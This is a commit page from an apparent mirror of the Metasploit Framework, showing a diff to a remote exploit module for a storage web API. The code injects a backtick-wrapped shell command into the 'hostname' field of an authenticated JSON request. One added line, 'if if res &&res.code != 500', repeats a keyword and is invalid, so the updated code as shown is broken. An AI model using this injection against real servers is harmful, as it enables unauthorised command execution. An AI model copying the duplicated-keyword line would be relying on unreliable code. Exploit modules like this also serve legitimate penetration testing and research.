infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update ueb9_api_storage.rb

bug/bundler_fix
caleBot 2017-10-20 13:48:29 -06:00 committed by GitHub
parent 8febde8291
commit abc749e1e8
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/linux/http/ueb9_api_storage.rb
View File

@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
session = Base64.strict_encode64(session) #b64 encode session token
#substitue the cmd into the hostname parameter
parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}"
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
res = send_request_cgi({
@ -77,11 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote
'encode_params' => false,
'data' => parms,
'headers' =>
{'AuthToken' => session,}
{'AuthToken' => session,}
})
if res.code != 500
print_error("Unexpected response")
if if res &&res.code != 500
fail_with(Failure::UnexpectedReply,'Unexpected response')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")